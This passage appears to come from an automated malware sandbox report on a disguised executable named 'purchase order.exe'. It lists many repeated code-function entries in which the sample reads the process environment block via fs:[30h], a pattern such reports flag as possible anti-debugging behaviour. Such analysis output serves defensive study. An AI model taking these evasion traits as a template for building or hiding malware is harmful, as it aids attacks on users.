                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01620115 mov eax, dword ptr fs:[00000030h]3_2_01620115
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160A118 mov ecx, dword ptr fs:[00000030h]3_2_0160A118
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160A118 mov eax, dword ptr fs:[00000030h]3_2_0160A118
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160A118 mov eax, dword ptr fs:[00000030h]3_2_0160A118
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160A118 mov eax, dword ptr fs:[00000030h]3_2_0160A118
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01590124 mov eax, dword ptr fs:[00000030h]3_2_01590124
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016361E5 mov eax, dword ptr fs:[00000030h]3_2_016361E5
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE1D0 mov eax, dword ptr fs:[00000030h]3_2_015DE1D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE1D0 mov eax, dword ptr fs:[00000030h]3_2_015DE1D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE1D0 mov ecx, dword ptr fs:[00000030h]3_2_015DE1D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE1D0 mov eax, dword ptr fs:[00000030h]3_2_015DE1D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE1D0 mov eax, dword ptr fs:[00000030h]3_2_015DE1D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016261C3 mov eax, dword ptr fs:[00000030h]3_2_016261C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016261C3 mov eax, dword ptr fs:[00000030h]3_2_016261C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015901F8 mov eax, dword ptr fs:[00000030h]3_2_015901F8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E019F mov eax, dword ptr fs:[00000030h]3_2_015E019F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E019F mov eax, dword ptr fs:[00000030h]3_2_015E019F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E019F mov eax, dword ptr fs:[00000030h]3_2_015E019F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E019F mov eax, dword ptr fs:[00000030h]3_2_015E019F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155A197 mov eax, dword ptr fs:[00000030h]3_2_0155A197
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155A197 mov eax, dword ptr fs:[00000030h]3_2_0155A197
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155A197 mov eax, dword ptr fs:[00000030h]3_2_0155A197
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A0185 mov eax, dword ptr fs:[00000030h]3_2_015A0185
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01604180 mov eax, dword ptr fs:[00000030h]3_2_01604180
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01604180 mov eax, dword ptr fs:[00000030h]3_2_01604180
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161C188 mov eax, dword ptr fs:[00000030h]3_2_0161C188
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161C188 mov eax, dword ptr fs:[00000030h]3_2_0161C188
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01562050 mov eax, dword ptr fs:[00000030h]3_2_01562050
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6050 mov eax, dword ptr fs:[00000030h]3_2_015E6050
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158C073 mov eax, dword ptr fs:[00000030h]3_2_0158C073
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E016 mov eax, dword ptr fs:[00000030h]3_2_0157E016
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E016 mov eax, dword ptr fs:[00000030h]3_2_0157E016
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E016 mov eax, dword ptr fs:[00000030h]3_2_0157E016
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E016 mov eax, dword ptr fs:[00000030h]3_2_0157E016
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E4000 mov ecx, dword ptr fs:[00000030h]3_2_015E4000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01602000 mov eax, dword ptr fs:[00000030h]3_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6030 mov eax, dword ptr fs:[00000030h]3_2_015F6030
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155A020 mov eax, dword ptr fs:[00000030h]3_2_0155A020
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155C020 mov eax, dword ptr fs:[00000030h]3_2_0155C020
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E20DE mov eax, dword ptr fs:[00000030h]3_2_015E20DE
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155C0F0 mov eax, dword ptr fs:[00000030h]3_2_0155C0F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A20F0 mov ecx, dword ptr fs:[00000030h]3_2_015A20F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0155A0E3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E60E0 mov eax, dword ptr fs:[00000030h]3_2_015E60E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015680E9 mov eax, dword ptr fs:[00000030h]3_2_015680E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016260B8 mov eax, dword ptr fs:[00000030h]3_2_016260B8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016260B8 mov ecx, dword ptr fs:[00000030h]3_2_016260B8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156208A mov eax, dword ptr fs:[00000030h]3_2_0156208A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F80A8 mov eax, dword ptr fs:[00000030h]3_2_015F80A8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E035C mov eax, dword ptr fs:[00000030h]3_2_015E035C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E035C mov eax, dword ptr fs:[00000030h]3_2_015E035C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E035C mov eax, dword ptr fs:[00000030h]3_2_015E035C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E035C mov ecx, dword ptr fs:[00000030h]3_2_015E035C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E035C mov eax, dword ptr fs:[00000030h]3_2_015E035C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E035C mov eax, dword ptr fs:[00000030h]3_2_015E035C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E2349 mov eax, dword ptr fs:[00000030h]3_2_015E2349
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160437C mov eax, dword ptr fs:[00000030h]3_2_0160437C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162A352 mov eax, dword ptr fs:[00000030h]3_2_0162A352
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01608350 mov ecx, dword ptr fs:[00000030h]3_2_01608350
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155C310 mov ecx, dword ptr fs:[00000030h]3_2_0155C310
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01580310 mov ecx, dword ptr fs:[00000030h]3_2_01580310
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A30B mov eax, dword ptr fs:[00000030h]3_2_0159A30B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A30B mov eax, dword ptr fs:[00000030h]3_2_0159A30B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A30B mov eax, dword ptr fs:[00000030h]3_2_0159A30B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015683C0 mov eax, dword ptr fs:[00000030h]3_2_015683C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015683C0 mov eax, dword ptr fs:[00000030h]3_2_015683C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015683C0 mov eax, dword ptr fs:[00000030h]3_2_015683C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015683C0 mov eax, dword ptr fs:[00000030h]3_2_015683C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A3C0 mov eax, dword ptr fs:[00000030h]3_2_0156A3C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A3C0 mov eax, dword ptr fs:[00000030h]3_2_0156A3C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A3C0 mov eax, dword ptr fs:[00000030h]3_2_0156A3C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A3C0 mov eax, dword ptr fs:[00000030h]3_2_0156A3C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A3C0 mov eax, dword ptr fs:[00000030h]3_2_0156A3C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A3C0 mov eax, dword ptr fs:[00000030h]3_2_0156A3C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E63C0 mov eax, dword ptr fs:[00000030h]3_2_015E63C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015963FF mov eax, dword ptr fs:[00000030h]3_2_015963FF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E3F0 mov eax, dword ptr fs:[00000030h]3_2_0157E3F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E3F0 mov eax, dword ptr fs:[00000030h]3_2_0157E3F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E3F0 mov eax, dword ptr fs:[00000030h]3_2_0157E3F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161C3CD mov eax, dword ptr fs:[00000030h]3_2_0161C3CD
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016043D4 mov eax, dword ptr fs:[00000030h]3_2_016043D4
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016043D4 mov eax, dword ptr fs:[00000030h]3_2_016043D4
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E3DB mov eax, dword ptr fs:[00000030h]3_2_0160E3DB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E3DB mov eax, dword ptr fs:[00000030h]3_2_0160E3DB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E3DB mov ecx, dword ptr fs:[00000030h]3_2_0160E3DB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160E3DB mov eax, dword ptr fs:[00000030h]3_2_0160E3DB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015703E9 mov eax, dword ptr fs:[00000030h]3_2_015703E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558397 mov eax, dword ptr fs:[00000030h]3_2_01558397
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558397 mov eax, dword ptr fs:[00000030h]3_2_01558397
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558397 mov eax, dword ptr fs:[00000030h]3_2_01558397
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158438F mov eax, dword ptr fs:[00000030h]3_2_0158438F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158438F mov eax, dword ptr fs:[00000030h]3_2_0158438F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E388 mov eax, dword ptr fs:[00000030h]3_2_0155E388
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E388 mov eax, dword ptr fs:[00000030h]3_2_0155E388
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E388 mov eax, dword ptr fs:[00000030h]3_2_0155E388
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155A250 mov eax, dword ptr fs:[00000030h]3_2_0155A250
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01566259 mov eax, dword ptr fs:[00000030h]3_2_01566259
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610274 mov eax, dword ptr fs:[00000030h]3_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E8243 mov eax, dword ptr fs:[00000030h]3_2_015E8243
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E8243 mov ecx, dword ptr fs:[00000030h]3_2_015E8243
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161A250 mov eax, dword ptr fs:[00000030h]3_2_0161A250
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161A250 mov eax, dword ptr fs:[00000030h]3_2_0161A250
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564260 mov eax, dword ptr fs:[00000030h]3_2_01564260
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564260 mov eax, dword ptr fs:[00000030h]3_2_01564260
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564260 mov eax, dword ptr fs:[00000030h]3_2_01564260
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155826B mov eax, dword ptr fs:[00000030h]3_2_0155826B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155823B mov eax, dword ptr fs:[00000030h]3_2_0155823B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A2C3 mov eax, dword ptr fs:[00000030h]3_2_0156A2C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A2C3 mov eax, dword ptr fs:[00000030h]3_2_0156A2C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A2C3 mov eax, dword ptr fs:[00000030h]3_2_0156A2C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A2C3 mov eax, dword ptr fs:[00000030h]3_2_0156A2C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A2C3 mov eax, dword ptr fs:[00000030h]3_2_0156A2C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015702E1 mov eax, dword ptr fs:[00000030h]3_2_015702E1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015702E1 mov eax, dword ptr fs:[00000030h]3_2_015702E1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015702E1 mov eax, dword ptr fs:[00000030h]3_2_015702E1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E0283 mov eax, dword ptr fs:[00000030h]3_2_015E0283
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E0283 mov eax, dword ptr fs:[00000030h]3_2_015E0283
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E0283 mov eax, dword ptr fs:[00000030h]3_2_015E0283
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E284 mov eax, dword ptr fs:[00000030h]3_2_0159E284
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E284 mov eax, dword ptr fs:[00000030h]3_2_0159E284
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015702A0 mov eax, dword ptr fs:[00000030h]3_2_015702A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015702A0 mov eax, dword ptr fs:[00000030h]3_2_015702A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F62A0 mov eax, dword ptr fs:[00000030h]3_2_015F62A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F62A0 mov ecx, dword ptr fs:[00000030h]3_2_015F62A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F62A0 mov eax, dword ptr fs:[00000030h]3_2_015F62A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F62A0 mov eax, dword ptr fs:[00000030h]3_2_015F62A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F62A0 mov eax, dword ptr fs:[00000030h]3_2_015F62A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F62A0 mov eax, dword ptr fs:[00000030h]3_2_015F62A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568550 mov eax, dword ptr fs:[00000030h]3_2_01568550
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568550 mov eax, dword ptr fs:[00000030h]3_2_01568550
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159656A mov eax, dword ptr fs:[00000030h]3_2_0159656A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159656A mov eax, dword ptr fs:[00000030h]3_2_0159656A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159656A mov eax, dword ptr fs:[00000030h]3_2_0159656A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F6500 mov eax, dword ptr fs:[00000030h]3_2_015F6500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570535 mov eax, dword ptr fs:[00000030h]3_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570535 mov eax, dword ptr fs:[00000030h]3_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570535 mov eax, dword ptr fs:[00000030h]3_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570535 mov eax, dword ptr fs:[00000030h]3_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570535 mov eax, dword ptr fs:[00000030h]3_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570535 mov eax, dword ptr fs:[00000030h]3_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015665D0 mov eax, dword ptr fs:[00000030h]3_2_015665D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A5D0 mov eax, dword ptr fs:[00000030h]3_2_0159A5D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A5D0 mov eax, dword ptr fs:[00000030h]3_2_0159A5D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E5CF mov eax, dword ptr fs:[00000030h]3_2_0159E5CF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E5CF mov eax, dword ptr fs:[00000030h]3_2_0159E5CF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C5ED mov eax, dword ptr fs:[00000030h]3_2_0159C5ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C5ED mov eax, dword ptr fs:[00000030h]3_2_0159C5ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015625E0 mov eax, dword ptr fs:[00000030h]3_2_015625E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E59C mov eax, dword ptr fs:[00000030h]3_2_0159E59C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01594588 mov eax, dword ptr fs:[00000030h]3_2_01594588
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01562582 mov eax, dword ptr fs:[00000030h]3_2_01562582
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01562582 mov ecx, dword ptr fs:[00000030h]3_2_01562582
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015845B1 mov eax, dword ptr fs:[00000030h]3_2_015845B1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015845B1 mov eax, dword ptr fs:[00000030h]3_2_015845B1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E05A7 mov eax, dword ptr fs:[00000030h]3_2_015E05A7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E05A7 mov eax, dword ptr fs:[00000030h]3_2_015E05A7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E05A7 mov eax, dword ptr fs:[00000030h]3_2_015E05A7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158245A mov eax, dword ptr fs:[00000030h]3_2_0158245A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155645D mov eax, dword ptr fs:[00000030h]3_2_0155645D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
